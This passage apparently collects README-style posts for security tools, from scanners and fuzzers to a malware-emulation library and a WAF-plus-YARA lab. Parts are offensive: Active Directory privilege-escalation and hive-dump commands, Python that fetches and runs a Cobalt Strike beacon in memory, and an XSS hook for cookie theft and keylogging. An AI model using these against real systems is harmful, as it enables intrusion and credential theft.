    Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes
    C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32

    Screenshots

    Example 1

    Example 2

    Example 3

    Example 4

    Example 5



    Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

    By: Zion3R


    This tool is very helpful for finding vulnerabilities present in web applications.

    • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generating malicious inputs and evaluating the application's responses.
      • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
      • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap, etc. in order to scan ports, sites, hosts and networks to find vulnerabilities like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

    Tools Used

    Serial No. Tool Name Serial No. Tool Name
    1 whatweb 2 nmap
    3 golismero 4 host
    5 wget 6 uniscan
    7 wafw00f 8 dirb
    9 davtest 10 theharvester
    11 xsser 12 fierce
    13 dnswalk 14 dnsrecon
    15 dnsenum 16 dnsmap
    17 dmitry 18 nikto
    19 whois 20 lbd
    21 wapiti 22 devtest
    23 sslyze

    Working

    Phase 1

    • The user has to write: "python3 web_scan.py (https or http) ://example.com"
    • At first, the program will note the initial run time, then it will build the URL with "www.example.com".
    • After this step, the system will check the internet connection using ping.
    • Functionalities:
      • To open the help menu, use --help; to update, use --update
      • To skip the current scan/test: CTRL+C
      • To quit the scanner: CTRL+Z
      • The program will report the scanning time taken by the tool for each specific test.

    Phase 2

    • From here the main function of the scanner starts:
    • The scanner will automatically select a tool to start scanning.
    • Scanners that will be used and filename rotation (default: enabled (1))
    • The command used to initiate each tool (with parameters and extra params) is already given in the code.
    • After finding a vulnerability in the web application, the scanner will classify it in a specific format:
      • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
      • Here c (critical) denotes the most severe vulnerability, whereas l (low) denotes the least vulnerable system.

    Definitions:-

    • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

    • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

    • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

    • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

    • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

    • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
      0.1 - 3.9 Low
      4.0 - 6.9 Medium
      7.0 - 8.9 High
      9.0 - 10.0 Critical
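
    A tiny helper mirroring the severity ranges above (a sketch, not the scanner's own code):

    def cvss_severity(score: float) -> str:
        # Maps a CVSS v3 base score onto the advisory severity ranges listed above.
        if score >= 9.0:
            return "Critical"
        if score >= 7.0:
            return "High"
        if score >= 4.0:
            return "Medium"
        if score >= 0.1:
            return "Low"
        return "Info"  # a score of 0.0 falls outside the table; treated as informational here

    print(cvss_severity(8.1))  # -> High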

    Vulnerabilities

    • After this, the scanner will show results which include:
      • Response time
      • Total time for scanning
      • Class of vulnerability

    Remediation

    • Now, the scanner will explain the harmful effects of that specific type of vulnerability.
    • The scanner points to sources (websites) to learn more about the vulnerabilities.
    • After this step, the scanner suggests some remedies to overcome the vulnerabilities.

    Phase 3

    • Scanner will Generate a proper report including
      • Total number of vulnerabilities scanned
      • Total number of vulnerabilities skipped
      • Total number of vulnerabilities detected
      • Time taken for total scan
      • Details about each and every vulnerability.
    • All scan output is written into SA-Debug-ScanLog under the same directory for debugging purposes.
    • For debugging purposes, you can view the complete output generated by all the tools in SA-Debug-ScanLog.

    Use

    Use Program as python3 web_scan.py (https or http) ://example.com
    --help
    --update
    Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
    1 IPv6 2 Wordpress
    3 SiteMap/Robot.txt 4 Firewall
    5 Slowloris Denial of Service 6 HEARTBLEED
    7 POODLE 8 OpenSSL CCS Injection
    9 FREAK 10 Firewall
    11 LOGJAM 12 FTP Service
    13 STUXNET 14 Telnet Service
    15 LOG4j 16 Stress Tests
    17 WebDAV 18 LFI, RFI or RCE.
    19 XSS, SQLi, BSQL 20 XSS Header not present
    21 Shellshock Bug 22 Leaks Internal IP
    23 HTTP PUT DEL Methods 24 MS10-070
    25 Outdated 26 CGI Directories
    27 Interesting Files 28 Injectable Paths
    29 Subdomains 30 MS-SQL DB Service
    31 ORACLE DB Service 32 MySQL DB Service
    33 RDP Server over UDP and TCP 34 SNMP Service
    35 Elmah 36 SMB Ports over TCP and UDP
    37 IIS WebDAV 38 X-XSS Protection

    Installation

    git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
    cd Scanner-and-Patcher/setup
    python3 -m pip install --no-cache-dir -r requirements.txt

    Screenshots of Scanner

    Contributions

    Template contributions , Feature Requests and Bug Reports are more than welcome.

    Authors

    GitHub: @Malwareman007
    GitHub: @Riya73
    GitHub:@nano-bot01

    Contributing

    Contributions, issues and feature requests are welcome!
    Feel free to check issues page.



    Firefly - Black Box Fuzzer For Web Applications

    By: Zion3R

    Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.

    Note:

    Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.

     

    Advantages

    • Heavy use of goroutines and internal hardware for great performance
    • Built-in engine that handles each task for "x" response results inductively
    • Highly customizable to handle more complex fuzzing
    • Filter options and request verifications to avoid junk results
    • Friendly error and debug output
    • Built-in payloads (the default list is mixed with wordlists from SecLists)
    • Payload tampering and encoding functionality

    Features


    Installation

    go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

    If the above install method does not work, try the following:

    git clone https://github.com/Brum3ns/firefly.git
    cd firefly/
    go build cmd/firefly/firefly.go
    ./firefly -h

    Usage

    Simple

    firefly -h
    firefly -u 'http://example.com/?query=FUZZ'

    Advanced usage

    Request

    Different types of request input that can be used

    Basic

    firefly -u 'http://example.com/?query=FUZZ' --timeout 7000

    Request with different methods and protocols

    firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws

    Pipeline

    echo 'http://example.com/?query=FUZZ' | firefly 

    HTTP Raw

    firefly -r '
    GET /?query=FUZZ HTTP/1.1
    Host: example.com
    User-Agent: FireFly'

    This will send the raw HTTP request and auto-detect all GET and/or POST parameters to fuzz.

    firefly -r '
    POST /?A=1 HTTP/1.1
    Host: example.com
    User-Agent: Firefly
    X-Host: FUZZ

    B=2&C=3' -au replace

    Request Verifier

    Request verification is the most important part. This feature lets Firefly learn the core behavior of the target you fuzz. It's important to favor quality over quantity: more verification requests lead to better quality at the cost of performance (depending on your hardware).

    firefly -u 'http://example.com/?query=FUZZ' -e 

    Payloads

    Payloads can be highly customized, and with a good core wordlist it's possible to fully adapt the payload wordlist within Firefly itself.

    Payload debug

    Display the format of all payloads and exit

    firefly -show-payload

    Tampers

    List all available tampers

    firefly -list-tamper

    Tamper all payloads with a given type (more than one can be used, separated by commas)

    firefly -u 'http://example.com/?query=FUZZ' -e s2c

    Encode

    firefly -u 'http://example.com/?query=FUZZ' -e hex

    Hex then URL encode all payloads

    firefly -u 'http://example.com/?query=FUZZ' -e hex,url

    Payload regex replace

    firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'

    The payloads ' or (1=1)-- - and " or(20=20)or " will result in ' or (13=(37-24))-- - and " or(13=(37-24))or ", where the => (with spaces) indicates the "replace to" part.
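
    A rough illustration of that replacement using Python's re module (a sketch, not Firefly's internals):

    import re

    payloads = ["' or (1=1)-- -", '" or(20=20)or "']
    pattern, replacement = r"\([0-9]+=[0-9]+\)", "(13=(37-24))"
    print([re.sub(pattern, replacement, p) for p in payloads])
    # -> ["' or (13=(37-24))-- -", '" or(13=(37-24))or "']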

    Filters

    Filter options to filter/match requests that include a given rule.

    Filter response to ignore (filter) status code 302 and line count 0

    firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0

    Filter responses to include (match) regex, and status code 200

    firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
    firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200

    Performance

    Performance and time delays to use for the request process

    Threads / Concurrency

    firefly -u 'http://example.com/?query=FUZZ' -t 35

    Time delay in milliseconds (ms) for each concurrent request

    FireFly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000

    Wordlists

    Wordlists that contain the payloads can be added separately or extracted from a given folder

    Single Wordlist with its attack type

    firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz

    Extract all wordlists inside a folder. The attack type depends on the suffix <type>_wordlist.txt

    firefly -u 'http://example.com/?query=FUZZ' -w wl/

    Example

    Wordlist names inside the folder wl:

    1. fuzz_wordlist.txt
    2. time_wordlist.txt

    Output

    JSON output is strongly recommended. This is because you can benefit from the jq tool to navigate through the results and compare them.

    (If Firefly is pipeline chained with other tools, standard plaintext may be a better choice.)

    Simple plaintext output format

    firefly -u 'http://example.com/?query=FUZZ' -o file.txt

    JSON output format (recommended)

    firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

    Community

    Everyone in the community is welcome to suggest new features, improvements and/or add new payloads to Firefly; just make a pull request or add a comment with your suggestions!



    BackupOperatorToolkit - The BackupOperatorToolkit Contains Different Techniques Allowing You To Escalate From Backup Operator To Domain Admin

    By: Zion3R


    The BackupOperatorToolkit contains different techniques allowing you to escalate from Backup Operator to Domain Admin.

    Usage

    The BackupOperatorToolkit (BOT) has 4 different modes that allow you to escalate from Backup Operator to Domain Admin.
    Use "runas.exe /netonly /user:domain.dk\backupoperator powershell.exe" before running the tool.


    Service Mode

    The SERVICE mode creates a service on the remote host that will be executed when the host is rebooted.
    The service is created by modifying the remote registry. This is possible by passing the "REG_OPTION_BACKUP_RESTORE" value to RegOpenKeyExA and RegSetValueExA.
    It is not possible to have the service executed immediately as the service control manager database "SERVICES_ACTIVE_DATABASE" is loaded into memory at boot and can only be modified with local administrator privileges, which the Backup Operator does not have.

    .\BackupOperatorToolkit.exe SERVICE \\PATH\To\Service.exe \\TARGET.DOMAIN.DK SERVICENAME DISPLAYNAME DESCRIPTION

    DSRM Mode

    The DSRM mode will set the DsrmAdminLogonBehavior registry key found in "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" to either 0, 1, or 2.
    Setting the value to 0 will only allow the DSRM account to be used when in recovery mode.
    Setting the value to 1 will allow the DSRM account to be used when the Directory Services service is stopped and the NTDS is unlocked.
    Setting the value to 2 will allow the DSRM account to be used with network authentication such as WinRM.
    If the DUMP mode has been used and the DSRM account has been cracked offline, set the value to 2 and log into the Domain Controller with the DSRM account which will be local administrator.

    .\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2

    DUMP Mode

    The DUMP mode will dump the SAM, SYSTEM, and SECURITY hives to a local path on the remote host or upload the files to a network share.
    Once the hives have been dumped you could PtH with the Domain Controller hash, crack DSRM and enable network auth, or possibly authenticate with another account found in the dumps. Accounts from other forests may be stored in these files, I'm not sure why but this has been observed on engagements with management forests. This mode is inspired by the BackupOperatorToDA project.

    .\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK

    IFEO Mode

    The IFEO (Image File Execution Options) mode will enable you to run an application when a specific process is terminated.
    This could grant a shell sooner than the SERVICE mode in case the target host is heavily utilized and rarely rebooted.
    The executable will be running as a child to the WerFault.exe process.

    .\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK






    PythonMemoryModule - Pure-Python Implementation Of MemoryModule Technique To Load Dll And Unmanaged Exe Entirely From Memory

    By: Zion3R


    "Python memory module" AI generated pic - hotpot.ai


    pure-python implementation of MemoryModule technique to load a dll or unmanaged exe entirely from memory

    What is it

    PythonMemoryModule is a Python ctypes port of the MemoryModule technique originally published by Joachim Bauch. It can load a dll or unmanaged exe using Python without requiring the use of an external library (pyd). It leverages pefile to parse PE headers and ctypes to perform the native calls.

    The tool was originally intended to be used as a Pyramid module to provide evasion against AV/EDR by loading dll/exe payloads in python.exe entirely from memory; however, other use cases are possible (IP protection, in-memory loading of pyds, spinoffs for other stealthier techniques), so I decided to create a dedicated repo.


    Why it can be useful

    1. It allows using the MemoryModule technique entirely in the interpreted Python language, enabling the loading of a dll from a memory buffer using the stock signed python.exe binary, without dropping on disk external code/libraries (such as pymemorymodule bindings) that can be flagged by AV/EDRs or raise a user's suspicion.
    2. Using the MemoryModule technique in compiled-language loaders would require embedding the MemoryModule code within the loaders themselves. This can be avoided by using the interpreted Python language and PythonMemoryModule, since the code can be executed dynamically and in memory.
    3. You can get some level of Intellectual Property protection by downloading, decrypting and loading dlls dynamically in memory, keeping them hidden from prying eyes. Bear in mind that the dlls can still be recovered from memory and reverse-engineered, but at least it would require some more effort by the attacker.
    4. You can load a stageless payload dll without performing injection or shellcode execution. The loading process mimics the LoadLibrary Windows API (which takes a path on disk as input) without actually calling it, operating in memory instead.

    How to use it

    In the following example a Cobalt Strike stageless beacon dll is downloaded (not saved on disk), loaded in memory and started by calling the entrypoint.

    import urllib.request
    import ctypes
    import pythonmemorymodule
    request = urllib.request.Request('http://192.168.1.2/beacon.dll')
    result = urllib.request.urlopen(request)
    buf=result.read()
    dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)
    startDll = dll.get_proc_addr('StartW')
    assert startDll()
    #dll.free_library()

    Note: if you use staging in your malleable profile the dll would not be able to load with LoadLibrary, hence MemoryModule won't work.

    How to detect it

    Using the MemoryModule technique will mostly respect the sections' permissions of the target DLL and avoid the noisy RWX approach. However within the program memory there will be a private commit not backed by a dll on disk and this is a MemoryModule telltale.

    Future improvements

    1. add support for argument parsing.
    2. add support (basic) for .NET assemblies execution.


    XSS-Exploitation-Tool - An XSS Exploitation Tool

    By: Zion3R


    XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.

    This tool is only for educational purposes; do not use it against real environments.


    Features

    • Technical Data about victim browser
    • Geolocation of the victim
    • Snapshot of the hooked/visited page
    • Source code of the hooked/visited page
    • Exfiltrate input field data
    • Exfiltrate cookies
    • Keylogging
    • Display alert box
    • Redirect user

    Installation

    Tested on Debian 11

    You may need Apache, a MySQL database, and PHP with the following modules:

    $ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
    $ sudo rm /var/www/index.html

    Install Git and pull the XSS-Exploitation-Tool source code:

    $ sudo apt-get install git

    $ cd /tmp
    $ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
    $ sudo mv XSS-Exploitation-Tool/* /var/www/html/

    Install composer, then install the application dependencies:

    $ sudo apt-get install composer
    $ cd /var/www/html/
    $ sudo chown -R $your_debian_user:$your_debian_user /var/www/
    $ composer install
    $ sudo chown -R www-data:www-data /var/www/

    Init the database

    $ sudo mysql

    Creating a new user with specific rights:

    MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
    Query OK, 0 rows affected (0.00 sec)

    MariaDB [(none)]> flush privileges;
    Query OK, 0 rows affected (0.00 sec)

    MariaDB [(none)]> quit
    Bye

    Create the database by visiting the page http://server-ip/reset_database.php (this will result in an empty page).

    Adapt the javascript hook file

    The file hook.js is the JavaScript hook. You need to replace the IP address in its first line with the XSS Exploitation Tool server's IP address:

    var address = "your server ip";

    How it works

    First, create a page (or exploit a Cross-Site Scripting vulnerability) to insert the Javascript hook file (see exploit.html at the root dir):

    ?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

    Then, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers:

    Screenshots



    Jsfinder - Fetches JavaScript Files Quickly And Comprehensively

    By: Zion3R


    jsFinder is a command-line tool written in Go that scans web pages to find JavaScript files linked in the HTML source code. It searches for any attribute that can contain a JavaScript file (e.g., src, href, data-main, etc.) and extracts the URLs of the files to a text file. The tool is designed to be simple to use, and it supports reading URLs from a file or from standard input.

    jsFinder is useful for web developers and security professionals who want to find and analyze the JavaScript files used by a web application. By analyzing the JavaScript files, it's possible to understand the functionality of the application and detect any security vulnerabilities or sensitive information leakage.
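
    As a rough illustration of that idea (jsFinder itself is written in Go, and its real extraction logic differs), the Python sketch below fetches a page and pulls .js URLs out of attribute values with a single regular expression; the pattern and the example URL are assumptions for demonstration only.

    import re
    import urllib.request
    from urllib.parse import urljoin

    # heuristic: any quoted/assigned attribute value that ends in .js (plus optional query string)
    JS_RE = re.compile(r"""["'=]\s*([^"'\s>]+\.js(?:\?[^"'\s>]*)?)""", re.IGNORECASE)

    def find_js(url):
        html = urllib.request.urlopen(url).read().decode("utf-8", errors="ignore")
        # resolve relative references against the page URL and de-duplicate
        return sorted({urljoin(url, match) for match in JS_RE.findall(html)})

    for js_url in find_js("https://example.com"):
        print(js_url)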


    Features

    • Reading URLs from a file or from stdin using command line arguments.
    • Running multiple HTTP GET requests concurrently to each URL.
    • Limiting the concurrency of HTTP GET requests using a flag.
    • Using a regular expression to search for JavaScript files in the response body of the HTTP GET requests.
    • Writing the found JavaScript files to a file specified in the command line arguments or to a default file named "output.txt".
    • Printing informative messages to the console indicating the status of the program's execution and the output file's location.
    • Allowing the program to run in verbose or silent mode using a flag.

    Installation

    jsFinder requires Go 1.20 to install successfully. Run the following command to get the repo:

    go install -v github.com/kacakb/jsfinder@latest

    Usage

    To see which flags you can use with the tool, use the -h flag.

    jsfinder -h 
    Flag     Description
    -l       Specifies the filename to read URLs from.
    -c       Specifies the maximum number of concurrent requests to be made. The default value is 20.
    -s       Runs the program in silent mode. If this flag is not set, the program runs in verbose mode.
    -o       Specifies the filename to write found URLs to. The default filename is output.txt.
    -read    Reads URLs from stdin instead of a file specified by the -l flag.

    Demo

    I


    If you want to read from stdin and run the program in silent mode, use this command:

    cat list.txt | jsfinder -read -s -o js.txt

     

    II


    If you want to read from a file, you should specify it with the -l flag and use this command:

    jsfinder -l list.txt -s -o js.txt

    You can also specify the concurrency with the -c flag. The default value is 20. If you want to read from a file, you should specify it with the -l flag and use this command:

    jsfinder -l list.txt -c 50 -s -o js.txt

    TODOs

    • Adding new features
    • Improving performance
    • Adding a cookie flag
    • Reading regex from a file
    • Integrating the kacak tool (coming soon)

    Screenshot

    Contact

    If you have any questions, feedback or collaboration suggestions related to this project, please feel free to contact me via:

    e-mail

    Dumpulator - An Easy-To-Use Library For Emulating Memory Dumps. Useful For Malware Analysis (Config Extraction, Unpacking) And Dynamic Analysis In General (Sandboxing)

    By: Zion3R


    Note: This is a work-in-progress prototype, please treat it as such. Pull requests are welcome! You can get your feet wet with good first issues

    An easy-to-use library for emulating code in minidump files. Here are some links to posts/videos using dumpulator:


    Examples

    Calling a function

    The example below opens StringEncryptionFun_x64.dmp (download a copy here), allocates some memory and calls the decryption function at 0x140001000 to decrypt the string at 0x140017000:

    from dumpulator import Dumpulator

    dp = Dumpulator("StringEncryptionFun_x64.dmp")
    temp_addr = dp.allocate(256)
    dp.call(0x140001000, [temp_addr, 0x140017000])
    decrypted = dp.read_str(temp_addr)
    print(f"decrypted: '{decrypted}'")

    The StringEncryptionFun_x64.dmp is collected at the entry point of the tests/StringEncryptionFun example. You can get the compiled binaries for StringEncryptionFun here

    Tracing execution

    from dumpulator import Dumpulator

    dp = Dumpulator("StringEncryptionFun_x64.dmp", trace=True)
    dp.start(dp.regs.rip)

    This will create StringEncryptionFun_x64.dmp.trace with a list of instructions executed and some helpful indications when switching modules etc. Note that tracing significantly slows down emulation and it's mostly meant for debugging.

    Reading utf-16 strings

    from dumpulator import Dumpulator

    dp = Dumpulator("my.dmp")
    buf = dp.call(0x140001000)
    dp.read_str(buf, encoding='utf-16')

    Running a snippet of code

    Say you have the following function:

    00007FFFC81C06C0 | mov qword ptr [rsp+0x10],rbx       ; prolog_start
    00007FFFC81C06C5 | mov qword ptr [rsp+0x18],rsi
    00007FFFC81C06CA | push rbp
    00007FFFC81C06CB | push rdi
    00007FFFC81C06CC | push r14
    00007FFFC81C06CE | lea rbp,qword ptr [rsp-0x100]
    00007FFFC81C06D6 | sub rsp,0x200 ; prolog_end
    00007FFFC81C06DD | mov rax,qword ptr [0x7FFFC8272510]

    You only want to execute the prolog and set up some registers:

    from dumpulator import Dumpulator

    prolog_start = 0x00007FFFC81C06C0
    # we want to stop the instruction after the prolog
    prolog_end = 0x00007FFFC81C06D6 + 7

    dp = Dumpulator("my.dmp", quiet=True)
    dp.regs.rcx = 0x1337
    dp.start(start=prolog_start, end=prolog_end)
    print(f"rsp: {hex(dp.regs.rsp)}")

    The quiet flag suppresses the logs about DLLs loaded and memory regions set up (for use in scripts where you want to reduce log spam).

    Custom syscall implementation

    You can (re)implement syscalls by using the @syscall decorator:

    from dumpulator import *
    from dumpulator.native import *
    from dumpulator.handles import *
    from dumpulator.memory import *

    @syscall
    def ZwQueryVolumeInformationFile(dp: Dumpulator,
                                     FileHandle: HANDLE,
                                     IoStatusBlock: P[IO_STATUS_BLOCK],
                                     FsInformation: PVOID,
                                     Length: ULONG,
                                     FsInformationClass: FSINFOCLASS
                                     ):
        return STATUS_NOT_IMPLEMENTED

    All the syscall function prototypes can be found in ntsyscalls.py. There are also a lot of examples there on how to use the API.

    To hook an existing syscall implementation you can do the following:

    import dumpulator.ntsyscalls as ntsyscalls

    @syscall
    def ZwOpenProcess(dp: Dumpulator,
                      ProcessHandle: Annotated[P[HANDLE], SAL("_Out_")],
                      DesiredAccess: Annotated[ACCESS_MASK, SAL("_In_")],
                      ObjectAttributes: Annotated[P[OBJECT_ATTRIBUTES], SAL("_In_")],
                      ClientId: Annotated[P[CLIENT_ID], SAL("_In_opt_")]
                      ):
        process_id = ClientId.read_ptr()
        assert process_id == dp.parent_process_id
        ProcessHandle.write_ptr(0x1337)
        return STATUS_SUCCESS

    @syscall
    def ZwQueryInformationProcess(dp: Dumpulator,
                                  ProcessHandle: Annotated[HANDLE, SAL("_In_")],
                                  ProcessInformationClass: Annotated[PROCESSINFOCLASS, SAL("_In_")],
                                  ProcessInformation: Annotated[PVOID, SAL("_Out_writes_bytes_(ProcessInformationLength)")],
                                  ProcessInformationLength: Annotated[ULONG, SAL("_In_")],
                                  ReturnLength: Annotated[P[ULONG], SAL("_Out_opt_")]
                                  ):
        if ProcessInformationClass == PROCESSINFOCLASS.ProcessImageFileNameWin32:
            if ProcessHandle == dp.NtCurrentProcess():
                main_module = dp.modules[dp.modules.main]
                image_path = main_module.path
            elif ProcessHandle == 0x1337:
                image_path = R"C:\Windows\explorer.exe"
            else:
                raise NotImplementedError()
            buffer = UNICODE_STRING.create_buffer(image_path, ProcessInformation)
            assert ProcessInformationLength >= len(buffer)
            if ReturnLength.ptr:
                dp.write_ulong(ReturnLength.ptr, len(buffer))
            ProcessInformation.write(buffer)
            return STATUS_SUCCESS
        return ntsyscalls.ZwQueryInformationProcess(dp,
                                                    ProcessHandle,
                                                    ProcessInformationClass,
                                                    ProcessInformation,
                                                    ProcessInformationLength,
                                                    ReturnLength
                                                    )

    Custom structures

    Since v0.2.0 there is support for easily declaring your own structures:

    from dumpulator.native import *

    class PROCESS_BASIC_INFORMATION(Struct):
        ExitStatus: ULONG
        PebBaseAddress: PVOID
        AffinityMask: KAFFINITY
        BasePriority: KPRIORITY
        UniqueProcessId: ULONG_PTR
        InheritedFromUniqueProcessId: ULONG_PTR

    To instantiate these structures you have to use a Dumpulator instance:

    pbi = PROCESS_BASIC_INFORMATION(dp)
    assert ProcessInformationLength == Struct.sizeof(pbi)
    pbi.ExitStatus = 259 # STILL_ACTIVE
    pbi.PebBaseAddress = dp.peb
    pbi.AffinityMask = 0xFFFF
    pbi.BasePriority = 8
    pbi.UniqueProcessId = dp.process_id
    pbi.InheritedFromUniqueProcessId = dp.parent_process_id
    ProcessInformation.write(bytes(pbi))
    if ReturnLength.ptr:
        dp.write_ulong(ReturnLength.ptr, Struct.sizeof(pbi))
    return STATUS_SUCCESS

    If you pass a pointer value as a second argument, the structure will be read from memory. You can declare pointers with myptr: P[MY_STRUCT] and dereference them with myptr[0].
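
    A minimal sketch of that pointer syntax is shown below; the structure names and the address are hypothetical, and only the P[...] declaration, the second-argument read and the [0] dereference follow the description above.

    from dumpulator import Dumpulator
    from dumpulator.native import *

    class DEVICE_INFO(Struct):      # hypothetical structure for illustration
        Flags: ULONG

    class DEVICE_LIST(Struct):      # hypothetical structure for illustration
        Count: ULONG
        First: P[DEVICE_INFO]       # pointer field declared with P[...]

    dp = Dumpulator("my.dmp")
    # hypothetical address: passing it as the second argument reads the struct from dump memory
    devices = DEVICE_LIST(dp, 0x140020000)
    print(devices.Count)
    print(devices.First[0].Flags)   # dereference the pointer with [0]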

    Collecting the dump

    There is a simple x64dbg plugin available called MiniDumpPlugin. The MiniDump command has been integrated into x64dbg since 2022-10-10. To create a dump, pause execution and execute the command MiniDump my.dmp.

    Installation

    From PyPI (latest release):

    python -m pip install dumpulator

    To install from source:

    python setup.py install

    Install for a development environment:

    python setup.py develop

    Related work

    • Dumpulator-IDA: This project is a small POC plugin for launching dumpulator emulation within IDA, passing it addresses from your IDA view using the context menu.
    • wtf: Distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and / or kernel-mode targets running on Microsoft Windows
    • speakeasy: Windows sandbox on top of unicorn.
    • qiling: Binary emulation framework on top of unicorn.
    • Simpleator: User-mode application emulator based on the Hyper-V Platform API.

    What sets dumpulator apart from sandboxes like speakeasy and qiling is that the full process memory is available. This improves performance because you can emulate large parts of malware without ever leaving unicorn. Additionally only syscalls have to be emulated to provide a realistic Windows environment (since everything actually is a legitimate process environment).

    Credits



    Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)

    By: Zion3R

    WAFARAY is a LAB deployment based on Debian 11.3.0 (stable) x64, made and cooked from two main ingredients, WAF + YARA, to detect malicious files (e.g. webshells, viruses, malware, binaries) typically uploaded through web functions (file uploads).


    Purpose

    In essence, the main idea is to use WAF + YARA (YARA right-to-left = ARAY) to detect malicious files at the WAF level before the WAF forwards them to the backend, e.g. files uploaded through web functions. See: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

    When a web page allows file uploads, most WAFs do not inspect the files before sending them to the backend. Implementing WAF + YARA can provide malware detection before the WAF forwards the files to the backend.

    Do malware detection through WAF?

    Yes, one solution is to use ModSecurity + ClamAV. Most guides call ClamAV as a process and not as a daemon; in that case, analysing a file can take more than 50 seconds per file. See this resource: https://kifarunix.com/intercept-malicious-file-upload-with-modsecurity-and-clamav/

    Do malware detection through WAF + YARA?

    :-( There are only a few clues out there (see Black Hat Asia 2019); please continue reading and see our quick LAB deployment below.

    WAFARAY: how does it work?

    Basically, it is a quick deployment that (1) ships pre-compiled and ready-to-use YARA rules invoked via ModSecurity (WAF) using a custom rule; (2) this custom rule inspects files that might contain malicious code, typically uploaded through web functions (file uploads); and (3) if a file is suspicious, ModSecurity rejects it with a 403 Forbidden.

    ✔️The YaraCompile.py script compiles all the Yara rules. (Python3 code)
    ✔️The test.conf file is a virtual host that contains the ModSecurity rules. (ModSecurity code)
    ✔️The ModSecurity rule calls modsec_yara.py to inspect the file being uploaded (see the sketch after this list). (Python3 code)
    ✔️Yara returns one of two verdicts: 1 (200 OK) or 0 (403 Forbidden)
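
    As a hedged sketch (not the project's actual code), an approver script in the spirit of modsec_yara.py could look like the following. It assumes the yara-python package is installed and that YaraCompile.py saved a compiled ruleset to /YaraRules/Compiled/rules.compiled (an assumed filename); ModSecurity passes the temporary upload path as the first argument and treats a leading "1" as allow and anything else as deny, which matches the 1/0 verdicts listed above.

    import sys
    import yara  # pip install yara-python

    COMPILED_RULES = "/YaraRules/Compiled/rules.compiled"  # assumed path

    def main():
        uploaded_file = sys.argv[1]           # temp file path passed by ModSecurity
        rules = yara.load(COMPILED_RULES)     # load the pre-compiled ruleset
        matches = rules.match(uploaded_file)
        if matches:
            # "0" tells ModSecurity to reject the upload (403 Forbidden)
            print(f"0 SUSPECTED [YaraSignature: {matches[0].rule}]")
        else:
            # "1" lets the request through to the backend (200 OK)
            print("1 CLEAN")

    if __name__ == "__main__":
        main()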

    Main Paths:

    • Yara Compiled rules: /YaraRules/Compiled
    • Yara Default rules: /YaraRules/rules
    • Yara Scripts: /YaraRules/YaraScripts
    • Apache vhosts: /etc/apache2/sites-enabled
    • Temporary files: /temporal

    Approach

    • Blueteamers: rule enforcement, better alerting, malware detection on files uploaded through web functions.
    • Redteamers/pentesters: grey-box scope, upload and bypass with a malicious file, rule enforcement.
    • Security Officers: ongoing alerting, threat hunting.
    • SOC: better monitoring of malicious files.
